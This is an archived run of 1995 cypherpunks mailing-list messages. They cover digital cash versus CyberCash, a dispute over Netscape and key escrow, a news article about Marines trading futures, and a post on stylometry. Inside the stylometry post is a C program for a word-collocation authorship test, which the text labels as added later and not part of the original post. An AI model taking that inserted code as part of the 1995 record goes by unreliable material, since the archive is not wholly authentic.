From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 4 Dec 95 14:46:54 PST
To: rsalz@osf.org (Rich Salz)
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
In-Reply-To: <9512042126.AA25932@sulphur.osf.org>
Message-ID: <199512042241.OAA22114@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As Andrew conveniently pointed out, it doesn't seem that
cybercash suits my purposes very well. I'll contact the addresses
below, and will inform the list of my results. Thanks.

> 
> > 	It doesn't appear that these people seem to care about
> > cash-like anonymous token-based payment schemes. Is that a valid
> > assessment? What is needed to make these people start caring about
> > that?
> 
> I didn't go to the meeting.  On the other hand, I notice Cybercash people
> in influential positions on the committee.  I'd also contact
> > > From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> > > To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Mon, 4 Dec 95 12:46:38 PST
To: turner@TeleCheck.com
Subject: Re: [POINTER:] Crypto Articles in Dr. Jobbs Journal
In-Reply-To: <9512041930.AA14103@mercury.telecheck.com>
Message-ID: <9512042047.AA30008@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the brain fart.  I've been up without sleep for a very long
time...  Ever since I attempted to attend the Austin CP meeting which
didn't take place, then I was in Dallas most of yesterday and last night.

I am running on nicotine, caffeine, and....  It's *Dr. Dobbs 
Journal.*  Apologies to the publishers and for those who are sending
me corrections...

> 
> For non Dr. Jobbs subscribers:
> 
> Dr. Jobbs Journal has several articles on encryption,
> including an article by Ian and Dave on the Netscape crack, multiple 
> encryption, and using MD5 for passwords.
> 
> Also, there is a very interesting article by the author of Applied
> Cryptography (the Big Mac himself), looking at differential and linear
> cryptoanalysis of the DES algorithm.
> 
> There are also some compression articles as well.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 12:52:02 PST
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <9512042051.AA00620@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>  Of course, the card company gets a big bill, and probably will try
>  to sue the site to recover, and both will pass those costs back to
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  the consumer, assuming they survive.  The total cost is still pretty
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  small to the individual.

You just said it right there.  The cost doesn't go away.  Just because  
individual credit card holders each only have to pay for a small fraction of  
the fraud pie doesn't make it right for executives to be saying that it is  
safe.  Any more than it is right for cellular companies to completely ignore  
security concerns because "the total cost is still pretty small to the  
individual."

The point is that these costs, no matter how small at the individual  
cardholder level, are avoidable.  Why should consumers have to pay for fraud  
that can be prevented?  By ignoring security concerns, encouraging people to  
use card numbers in an unsafe manner, and then passing the fraud burden onto  
the individual customers, card issuers will basically be stealing money from  
the consumers much in the same way that cellular telcos have been doing for  
years.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 4 Dec 95 12:18:28 PST
To: turner@TeleCheck.com
Subject: Re: [POINTER:] Crypto Articles in Dr. Jobbs Journal
In-Reply-To: <9512041930.AA14103@mercury.telecheck.com>
Message-ID: <Pine.3.89.9512041547.A23889-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


You mean Dr. Dobb's Journal.
             ^
You can look for sources at <http://www.ddj.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 4 Dec 95 12:29:59 PST
To: cypherpunks@toad.com
Subject: Commercial Apachessl
Message-ID: <Pine.3.89.9512041530.B23889-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Hi Sameer.

You mentioned the server won't be commercially free for licensing reasons?
(erased that post, darn) The RSA ones? Would it be free for commercial
purposes in Canada? (Are the problems restricted to RSA or also RC4?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 4 Dec 95 16:13:01 PST
To: cypherpunks@toad.com
Subject: Netscape and Jim Clark
Message-ID: <199512050004.QAA07307@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim must have done something wrong today, he only made $120,000,000...

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 14:08:10 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <9512042207.AA00653@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Sameer (sameer@c2.org) writes:
>  > 	It doesn't appear that these people seem to care about
>  > cash-like anonymous token-based payment schemes. Is that a valid
>  > assessment? What is needed to make these people start caring about
>  > that?
Rich (rsalz@osf.org) responds:
>  I didn't go to the meeting.  On the other hand, I notice Cybercash
>  people in influential positions on the committee.

But "CyberCash" isn't cash...

DigiCash == THE company with digital cash technology
CyberCash == Yet Another Company with a Net Credit Card Payment System


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 95 13:23:41 PST
To: JR@ns.cnb.uam.es
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <951204173237.20a03d03@ROCK.CNB.UAM.ES>
Message-ID: <Pine.SUN.3.91.951204160720.14502A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995 JR@ns.cnb.uam.es wrote:

> Black Unicorn <unicorn@polaris.mindport.net> wrote
> >On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

> > 
> >Let's put this example in a more personal context, with you as the 
> >netscape guru.  In fact, let us carry that assumption along, as really 
> >I'm talking to the netscape insiders to begin with.
> 
> 	Please, note that I have no liaison to Netscape. But I don't like all
> this brouhaha about whether this or that guy is evil because s/he does/
> doesn't hold with some principles/ends.
> 
> 	If one wants to be effective, one needs to understand the other
> side's point of view, so as to be able to develop coherent strategies that
> work.
> 
> 	Independently of what *my* personal convictions are -which I
> have never stated-, you can't forget that not everybody holds to your
> same ethics or needs to.

I'm afraid you have missed the point too.

I don't care as much what the personal positions are, or what the ethical 
center from which person x or person y works.

I am most distressed because of what I see as a snowjob.

"We are anti-GAK"

Great, tell me what you have done to prevent GAK from proliferating.

In the absence of an answer to that challenge, I have to question the 
first statement as fluff or PR.

This has nothing to do with Netscape sharing my opinion, or not sharing 
my view on the evil of GAK.  It has to do with putting up or shutting 
up.  I have been told that Netscape agrees with me, or will agree with 
me, I just don't know that I believe it yet.


> 
> ...
> >
> >Your faith in Joe Random vastly exceeds mine.
> 
> 	So it seems. Anyway, that's the only resource we have. If Joe
> Random doesn't care, then it doesn't matter too much what you or me
> can say. 

Uh... read the above again real carefully.  Think real hard about what 
you have said.

> Nor would it be correct that we imposed our view to the
> majority of Joes.

Isn't that what happens every day?  Or did something go anarchy while I 
wasn't watching?

> 
> ...
> >Your information cost is lower by a factor of 100 or more.  Putting the 
> >burden on our shoulders, and then couching it in terms of the cypherpunks 
> >being negative, when indeed we are merely pointing out to whoever will 
> >listen that a spineless money decision has been made, is the center of 
> >hypocrisy.  It sickens me.
> 
> 	Again, I'm not Netscape. So, don't tell *me*. If it sickens you
> the position of anyone, I'm sorry. It may sicken me too, but I don't
> think that only will change how things are (sic).
> ...
> >As does this psycho-babble trash.
> 
> 	It may be trash. But it works. Sorry if you don't like it, but
> that's how humans are.

And this is what I am talking about.  Statements from Netscape and her 
employees are beginning to look more and more like mere fluff, lies, and 
time-buyers based on the belief that this kind of psycho babble is the 
way to conduct your affairs.

> >So when pintos explode, I might as well just advertize hondas as a 
> >'better value' and not mention the rather glaring fault in the competing 
> >product?
> 
> 	Well, that -as I said- may depend on where you are. In some
> countries you could sue them, but you could not *say* they are bad.
> Odd, isn't it? But so it is.

I know of no country that forbids private parties (cypherpunks list) from 
pointing out flaws and concerns with a product.  (accepting of course 
those countries which lack the basic free speech, or where the government 
owned industry is being commented on).  Your complaint about the 
potential liability of such statements was in reference to the 
cypherpunks, or at least a few on the list, being 'negative' about 
Netscape.  A private action for that, when based on fact, isn't 
actionable anywhere I know about.

> >I might add, few cypherpunks (to their great credit) sell their 
> >software.  We are interested in the software being the strongest, and 
> >best quality.
> >
> 	So do I. And that's what I suggested: better alternatives. If
> there are some, then market forces will drive everything to our side.
> Just by making people angry we won't gain much.

It's the angry customer who walks out and takes his consumer cash 
elsewhere.  It amazes me how content everyone is to limit themselves.

> ..
> >You mean to realize that Netscape could care less about the 'educated' 
> >consumer who is displeased with the decision, and instead is following 
> >that large nose which sniffs the wafting scent of green?
> 
> 	Exactly. If you realize that, you know what the problem is. If
> you assume any company has to be bounded by any cypherpunkish ideas,
> which in addition hurt their business, then you are not addressing the
> real problem.

I don't have a problem with the company that is money grubbing until they 
try to convince me that they are not and then fail utterly to back it up.
One might even say that's a form of fraud.

> ...
> >Either support GAK or do not.  Don't give us horseshit about how you 
> >think we are being too hard on Netscape because we are educated 
> >consumers, and because we realize that GAK crypto is not the best product it 
> >could be.
> 
> 	Sorry man, but as soon as Democracy comes in, elites go out the
> window. It's the domain of the common man. If the common man doesn't hold
> with the opinions of the educated man, then the educated man has nothing
> to do.

Except try and educate the common man.  Look like anything that has been 
going on here on the list?  Duh.

> >It is as much our right to gripe and moan about the spineless decision as 
> >it is for you to make it.  To tell us to ignore it is hypocritical in the 
> >extreme.  If your product is so superior, why the hell should you care 
> >about a few cypherpunks moaning about this or that?  Aren't we members of 
> 
> 	You can gripe or moan or do as you wish. So do I, and I chose to
> express my opinion that educating the common man is more effective.

And griping and moaning isn't educating the common man because...?

> 	And once more: it's not my product. I have nothing to do with 
> Netscape. All I want is energies derived into effective courses.

Like sitting on hands.  Like admitting "there is nothing for (us) to do?"

> >Take your emotional censorship elsewhere.  And while you're at it, try 
> >making a superior product to please us, rather than some high-school 
> >textbook psycho-babble about saying only nice things to the other 
> >children in the sandbox.
> 
> 	I fear it is you who's becoming emotional and censoring. I didn't
> tell anybody to take his/her opinions anywhere else. I'm only exposing what
> my opinion is on how cryptography should be promoted and what is the
> -in my humble opinion- best course of action.
> 
> 	As for "children in the sandbox"... it also seems I have some more
> respect for those "Joe Random"s than you do. And even if they are so, I
> prefer to take them into adulthood rather than keeping crypto priesthood
> to myself and pontificating them what they should do relying on me.

I'd be happy if Joe Random became Joe Crypto.  Unlike you, I just don't 
assume that it has already happened.

> 
> 				jr
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Dec 95 13:29:39 PST
To: sameer@c2.org
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <9512042126.AA25932@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	It doesn't appear that these people seem to care about
> cash-like anonymous token-based payment schemes. Is that a valid
> assessment? What is needed to make these people start caring about
> that?

I didn't go to the meeting.  On the other hand, I notice Cybercash people
in influential positions on the committee.  I'd also contact
> > From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> > To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 4 Dec 95 16:34:46 PST
To: cypherpunks@toad.com
Subject: Stylometry
Message-ID: <199512050028.QAA04676@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



I recently came across an interesting book.  Detailed information follows.
It would seem (to me) to have interesting implications for anonymous
remailers.

Does anyone on the list have any knowledge of this subject?  I've seen
it hinted at, but never systematically explored.

In particular, does anyone know how it has advanced since the book was
written (1978)?  Additional references?

Dana W. Albrecht
dwa@corsair.com


------------------------------------------------------------------------------

Morton, A. Q. (Andrew Queen)
  Literary detection : how to prove authorship and fraud in literature and
  documents / A. Q. Morton.  [Epping, Eng.] : Bowker, c1978.  xiii, 221 p. ; 25 cm.
 
LC CALL NUMBER: PN171.F6 M64
 
SUBJECTS:
  Authorship, Disputed.
  Language and languages--Style.
  Linguistics--Statistical methods.
 
DEWEY DEC:  801/.959
 
NOTES:
  Includes index.
  Bibliography: p. 221.
 
ISBN:  0859350622 : L10.50
LCCN:  79-310591 r85

------------------------------------------------------------------------------

Contents

    List of Tables                                                      vii
    List of Figures                                                     xi
    Preface                                                             xiii

SECTION I    THE THEORY OF STYLOMETRY

    1.  The Problems of Identification and Recognition                    3
    2.  The First Steps                                                  19
    3.  Statistics and Stylometry                                        29
    4.  Statistics as Description                                        40
    5.  The Second Stage in Statistical Description                      51
    6.  Like or Unlike?  The Statistics of Comparisons                   71
    7.  The Rules of the Game                                            75

SECTION II   THE FEATURES OF LANGUAGE
             WHICH ARE OF PARTICULAR
             INTEREST IN STYLOMETRY

    8.  The Writer in his Works                                          95
    9.  The Inflected Language                                          108
          (i) Positional Measurements and Word Mobility                 109
         (ii) Isotropic Distributions                                   114
        (iii) Anisotropic Distributions                                 121
   10.  The Uninflected Language                                        130
   11.  The Occurrence of Proportional Word Pairs                       147

SECTION III  APPLICATIONS

   12.  Introductory                                                    153
   13.  The Homeric Problem                                             158
   14.  The Authorship of the Pauline Epistles                          165
   15.  The Shakespeare Problems                                        184
   16.  The Inimitable Jane                                             189
   17.  A Word from Baker Street                                        192
   18.  Let Justice be Done                                             195

   CONCLUSION                                                           208

   Appendix                                                             211
   Glossary                                                             215
   Bibliography                                                         221
   Index                                                                223

------------------------------------------------------------------------------

(From page 7)

   The main subject of this book is one special aspect of identification,
the determination of the authorship of texts.  Since the development of
photography it has been a simple matter to determine who wrote or who
typed out a text.  It is even possible to demonstrate which instrument was
used in the writing or typing.  But such physical comparisons do not
indicate who composed the text or altered it from its original form.  To
enable this to be done a descriptive science known as stylometry is
needed.  Stylometry is the science which describes and measures the
personal elements in literary or extempore utterances, so that it can be
said that one particular person is responsible for the composition rather
than any other person who might have been speaking or writing at that
time on the same subject for similar reasons.  Stylometry deals not with
the meaning of what is said or written but how it is being said or written.
Stylometry does not deal with the evidential value of statements.  It does
not ask whether this or that particular statement is true or reasonable,
but applies itself to the question, 'In whose words are these sentiments
expressed?'

------------------------------------------------------------------------------

Conclusion

Looking back, the development of stylometry is easy to see. De
Morgan was the first to point out the pattern of argument which should
be used in stylometry, statistics would describe samples and sampling
differences would become the measure of similarity or difference.  But to
suggest that something might well be true and to show that it is true are
two different propositions and it was a long time before anyone actually
developed a statistical test of authorship.  It should have been done by
Udny Yule in his book, _The Statistical Study of Literary Vocabulary_,
but he made an unfortunate error in calculating the standard errors of
sentence length distributions with the result that it was not until W.C.
Wake corrected the error and continued his study of sentence length
distributions of Greek authors in 1946 and 1957 that a reliable test was
established.
   With the pattern of argument confirmed, attention then turned to
what should be counted and analysed.  Like all his colleagues, the author
spent some time looking at those features of style which literary critics
had noted and used as the basis for their judgements.  This was making
stylometry the conversion of stylistic description into quantitative terms;
it was using the accumulated experience of scholars as it had been
expressed in traditional forms.  This proved to be an unexciting quest.  In
some cases, for example the suggestion of Sir Kenneth Dover that the
number of finite verbs used by a writer of Greek prose might be an
indicator of authorship, it turned out to be valid but required samples
impracticably large for any New Testament application, and in others it
soon became clear that the observations had no firm foundation in any
objective data.  It was the realisation that in Greek writing position was
of prime importance that gave stylometry its first general theory.  That such
a theory was justified was confirmed when a dramatic plea for help with a
police statement written in modern English posed a problem which was
rapidly solved by an adaptation of positional methods to the constraints
of an uninflected language.  In Greek where word movement is free, look
at word movement and position; in English where word movement is
restricted, look at immediate context.
   There is so much material available that routine applications of
stylometry will present few problems.  What remain intractable are
problems of mixed tests where one writer has been revised by another or
other situations in which the homogeneity of the text is in doubt.
   Immediate progress seems likely to be made in two directions.  Both
concern the efficiency of methods rather than the further development of
methods.  A simple way to increase the separation of two authors is to
combine a number of tests in multi-variate statistics.  Properly done this
will generate figures which show vast differences where such exist,
although the differences are diffused throughout a number of statistics
and are nowhere to be seen as clearly as the measure of their combined
effect.
   The difficulty is that multi-variate statistics can conceal the underlying
features and in some instances lead to confusion or misapprehension.
One such set of statistics showed the differences between brands of
cigarettes and showed very large differences.  But a study of the statistics
which were combined in the analysis revealed that the largest differences
concerned the packing and the printing on the packets.  While this might
be useful for anyone designing a machine to select brands and sort them
automatically, it was much less useful for any smoker who wanted to know
about the quality of the cigarette.
   The other development which is easy to forecast is the formation of
profiles of individual writers so that quick reference and resolution of
problems will be possible.  One way of doing this is to start with a set of
collocations.  It might be that after "and" a writer is very fond of using "the"
and hardly ever uses "so."  This can be made a test of how often "the" after "and"
occurs compared to "so" after "and".  The combination of a few such tests
based upon the personal maxima and minima of an author will soon
provide a measure by which he can be detected in a large number of
candidates.
  The ultimate aim has been set by the information theory experts who,
many years ago, calculated that in any 200 words, written or spoken,
there was enough information to enable their author to be picked out of
the human race.  This is like saying that every cubic mile of sea water
contains twenty tons of gold; it may be there but getting it out is not easy.
But the aim must be to be able to say of any couple of hundred words, it is
or is not the sole production of the person who produced this other
sample.  It may seem that we are a long way from being able to do so, but
how much nearer we have come in the last twenty years.  Who will say
that the next twenty years will not produce the desired result?

------------------------------------------------------------------------------
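
The collocation test sketched in the book's conclusion (how often "the" rather than "so" follows "and"), as an added C example that is not from the book or from the post: it counts the two followers in constructed sample texts and picks the candidate whose proportion is nearest to that of a disputed text. The sample sentences, the function names and the nearest-proportion comparison are assumptions made for illustration, and the samples are far smaller than any real test would need.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

typedef struct { int first; int second; } pair_count;

/* Count how often `first` and `second` directly follow `marker`.
   Words are runs of letters or apostrophes, compared in lower case. */
pair_count count_after(const char *text, const char *marker,
                       const char *first, const char *second) {
    pair_count pc = {0, 0};
    char prev[32] = "", cur[32];
    size_t n = 0;
    const char *p;
    for (p = text; ; p++) {
        unsigned char ch = (unsigned char)*p;
        if (isalpha(ch) || ch == '\'') {
            if (n < sizeof cur - 1) cur[n++] = (char)tolower(ch);
            continue;
        }
        if (n > 0) {                       /* a word just ended */
            cur[n] = '\0';
            if (strcmp(prev, marker) == 0) {
                if (strcmp(cur, first) == 0) pc.first++;
                else if (strcmp(cur, second) == 0) pc.second++;
            }
            strcpy(prev, cur);
            n = 0;
        }
        if (ch == '\0') break;
    }
    return pc;
}

/* Share of `first` among the two followers; -1.0 when neither occurs. */
double pair_share(pair_count pc) {
    int total = pc.first + pc.second;
    return total ? (double)pc.first / total : -1.0;
}

/* Index of the candidate whose share is nearest the disputed text's,
   or -1 when the disputed text (or every candidate) has no usable pair. */
int closest_candidate(const char *disputed, const char *const cand[], int ncand,
                      const char *marker, const char *first, const char *second) {
    double target = pair_share(count_after(disputed, marker, first, second));
    double best = 2.0;
    int i, best_i = -1;
    if (target < 0) return -1;
    for (i = 0; i < ncand; i++) {
        double s = pair_share(count_after(cand[i], marker, first, second));
        double d;
        if (s < 0) continue;
        d = s > target ? s - target : target - s;
        if (d < best) { best = d; best_i = i; }
    }
    return best_i;
}

/* Constructed samples: writer 0 favours "and the", writer 1 "and so". */
const char *const CANDIDATES[2] = {
    "We packed and the car was ready and the road was clear "
    "and so we left and the rain began.",
    "He waited and so did she and so the day passed "
    "and the light faded and so they went home."
};
const char DISPUTED[] =
    "They argued and the door closed and the house fell quiet "
    "and the clock ticked and so it ended.";

int main(void) {
    int i;
    for (i = 0; i < 2; i++) {
        pair_count pc = count_after(CANDIDATES[i], "and", "the", "so");
        printf("candidate %d: and-the=%d and-so=%d share=%.2f\n",
               i, pc.first, pc.second, pair_share(pc));
    }
    printf("disputed text is closest to candidate %d\n",
           closest_candidate(DISPUTED, CANDIDATES, 2, "and", "the", "so"));
    return 0;
}
```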






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 4 Dec 95 13:34:44 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <v02120d09ace90e1bce3b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>        It doesn't appear that these people seem to care about
>cash-like anonymous token-based payment schemes. Is that a valid
>assessment? What is needed to make these people start caring about
>that?

My guess is, they won't. Ever.

<Elmer Gantry Mode On>
We're looking right into the maw of the beast, here, folks. This is how
book-entry systems want to rule the world. It seems to me that all this
X.BlaBla stuff is about interlocking directories, offsetting book-entries
and audit trails back to the flood, so that if you break a trade, much less
evade taxes or engage in other horsemanlike behavior, they can sic the
Lawfully Deputed Authorities to slam you in the pokey.
<Elmer Gantry Mode Off>

Code words for this bunch include "non-repudiation", "Certification
Authorities", "X.Whatever", and of course "information infrastructure", and
is done usually in concert with, well, lawyers.

Michael Froomkin has had some experience with these types already this
month, and my anonymous informant, "Erwin Corey", the world's foremost
authority, is in the thick of these things.

I just got some mail from someone over at bnn who gave me the following
argument, just to show how they think:

1. If we use internet-level (ISP) or link-level (SSL,etc) strong
cryptography, governments can't keep an eye on the 4 horsemen, who would
then rule the world, and the government needs to save us from that.

2. If we just use encryption for the "little" stuff, like credit card
numbers, and signatures, and wire authorization codes, and the like, the
Powers that Be will let us play with money on the internet.

3.  So, go back to your sandbox boy, and let the adults get on with the
Important Stuff, okay?

Actually, argument #3 is implicit in all of this, but that's okay. Here's why.

As one cursed with hyper-analogizing the universe, I see the X.whatever
crowd as centralized surface transport, viz: Railroads and Ships. We're in
the car and plane business, point-to-point, autonomously operated by the
users of the technology for whatever they want to do.

The time is, say, 1910. They look up in the sky at the airplanes rattling
around, or they jump out of the way of a Model T clattering down the
street, and they mutter, "let the adults get on with the Important Stuff".
Cool.

What they really don't understand is that the internal combustion engine of
internetwork commerce, digital bearer certificate technology, is about to
rock their world.

The thing I hear over and over from these people is, "We just want to map
all this great experience we have with the Law of Commerce onto the
Information Superhighway, so we won't have to reinvent the wheel."  They
can't understand why *anyone* would want to remain anonymous. They can't
imagine the benefits of uncontrolled autonomous agents, buying or selling
things, (including themselves) in a global ecology of networks and silicon.

Just like the transportation magnates of the turn of the century couldn't
understand why someone wouldn't use a steam engine, because they're much
more efficient thermodynamically than any internal combustion engine could
ever be. The technology lends itself to economies of scale, and, well, it's
less wasteful that way. This is why J.Pierpont Morgan made a fortune
consolidating railroads and steel companies.

These people are just victims of their own success, really. They are the
end products of years of meritocratic selection, schooling, and
certification.  They have been practically bred to inhabit the top of
hierarchies.

So, when they look at the internet, they can see nothing else but what they
know. They see something like digital cash as an anomaly, an error in the
data, because even with a completely on-line system and Mark Twain Bank
walking very gingerly on the thin ice of new economic technology, MTB's
cost on a Digicash trade is $.50, while the most efficient book-entry
system on the net, First Virtual, has to charge, what? $5.00 to break even?
Wait until we can actually trust off-line payment schemes for *really*
small stuff, and get profits from issuing nano-money.

They don't get it. The network isn't a hierarchy. The network is a
geodesic. You don't need offsetting book entries, you can trade digital
certificates much cheaper. You don't need to control your software, you
need to make it autonomous and set it free.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 4 Dec 95 07:41:16 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512041541.QAA26295@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by anonymous-remailer@shell.portal.com () on 
Mon, 4 Dec  1:42 AM

>That authority now sits in other hands.  In silicon.
>
>I doubt the President wants a market meltdown as we 
>start to move  towards an election year.  Body bags and 
>a bad economic front are a  bad mix and could swing the 
>whole election with the dual near unsurmountable 
>election obstacles.
>
>Hopefully, god-willing, we won't face any tragedies.

-----

Financial Times, Dec 4, 1995

US Marine chiefs trade places to experience tranche warfare

Officers are preparing to do virtual battle in the Nymex oil
pits [and wargame FinCide]

By Laurie Morse

A dozen US Marine Corps generals and colonels will today march
on to the New York Mercantile Exchange trading floor and start
matching wits with commodity futures traders.

The traders often describe their fraught existence in the
trading rings as virtual warfare, and the US military appears
to agree.

Keen to find ways of training officers to cope with the
demands of high-tech 21st-century warfare, a group of Marine
Corps top brass will venture into the Nymex crude oil pit in
the World Trade Center after the regular market has closed.

Assisted by a group of handpicked veteran commodity traders,
the marines will plunge into a simulated session of futures
trading that will include several market reversals and a
barrage of oil-linked "news".

Mr Gary Lapayover, the Nymex trader co-ordinating the event,
says the trading session will allow the officers and traders
to become acquainted on friendly turf, and give the Marines a
glimpse of the multiple tasks -- and the speed -- that breakneck
trading entails.

Today's simulated trading will be followed tomorrow by a war
games session. About 15 traders will follow the generals to an
old officers' club on Governor's Island, off Manhattan, and
test their skills in a computerised game designed by Gama
Corp., a Virginia-based company that specialises in
computer-generated battle scenarios.

Later, the traders will tell the officers and their aides what
they think of the battle experience.

What do the Marines hope to learn from the commodities pits?
"Our vision of what warfare will be in the 21st century is
very different from what we've faced in the 20th," says
Colonel Tom Harkins, director of operations at the Marines'
war-fighting laboratory in Quantico, Virginia.

In future, the Marines expect to be drawn into smaller
conflicts of the type seen in Somalia and Bosnia. At the same
time, warfare will become increasingly digitalised, calling
for rapid decision-taking amid a barrage of information.
"How does a commander make decisions on a digital
battlefield?" asks Col Harkins. "Technology will increase the
tempo of battle, and the influx of digital information will
require skills in what you might call pattern analysis. This
is what futures traders do. In this exercise we want to see
how people who face these conditions every day deal with the
stress, and get comfortable with the risks."

During tomorrow's war games, traders will be confronted by an
on-screen battle area laid out on a grid, with as many as 50
small teams of cyber-soldiers seeking the "enemy".

Once "contact" is made, the teams will request firepower.
Under pressure, "commanders" must decide how to deploy
resources to the best strategic advantage, while limiting
losses.

For Mr Eric Bolling, an independent trader who has survived
nine years in the Nymex energy pits, the Marines are being
shrewd in seeking to cross laser-swords with battle-hardened
heroes of the trading pits.

Mr Bolling, a 33-year-old former minor league baseball player,
has no military background, but sees a lot of parallels
between trading, sport and the armed services. All three
require high levels of self-motivation and decision-making
ability.

Some of the generals and colonels may be shown to be more
suited to high-stress, high-stakes environments than others,
he says. "You have to be able to prioritise and analyse a lot
of information rapidly -- then initiate risk by making a
decision; and, finally, manage that risk by having the
discipline to manage the trade," says Mr Bolling.

"A lot of people can't do that, and wash out of these markets.
I don't think it's something that can be learned really --
it's a personality type."

Mr Lapayover said he selected floor veterans like Mr Bolling
to participate because he was looking for "survivors" -- people
who have been successful traders over a number of years.
"Military experience wasn't a factor. The Marines are looking
for people that can help them understand the process."

Mr Lapayover has also suggested that the top brass visit the
"war rooms" of America's largest investment banks to observe
Wall Street's fixed income and equities traders, and the
strategies of high-stakes corporate raiders.

The war games are part of a new programme directed by General
Charles Krulak, commandant of the Marine Corps.

"War games are not designed to give you a total solution, they
are designed to give you insight," he says. "We're going to
have our laboratory analysts with us, and they will be looking
at improving the process."

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 14:58:50 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951204160720.14502A-100000@polaris.mindport.net>
Message-ID: <199512042259.RAA08133@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
>I am most distressed because of what I see as a snowjob.
>
>"We are anti-GAK"
>
>Great, tell me what you have done to prevent GAK from proliferating.

This is a poor argument.

I'd consider myself "anti-war", though I've done nothing more than
argue against it and behave peacefully myself.  I've even heard
"pro-war" arguments and considered some of them valid, though not
enough to change my opinion.

Netscape has pretty clearly said that they don't like the idea of GAK,
and that in fora where such things are discussed, they'll argue against
it.  They've also said that they won't let mandatory GAK put them out
of business.  That *doesn't* make them pro-GAK.

Jim Clark hasn't made any statements to the effect that *Netscape*
supports GAK (quite the contrary), but he *has* noted the government
position --- "GAK is necessary for law enforcement".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Dec 95 17:25:55 PST
To: cypherpunks@toad.com
Subject: NSA Frisbee [EXTREMELY FRIVOLOUS]
Message-ID: <v02120d02ace940b4939e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Mike Bakkes, who is on the EC board, recently brought in
an NSA flying disk. A .gif of it is available at:

http://www.communities.com/foo/NSAfris.gif

We are currently looking for a source of these; we will
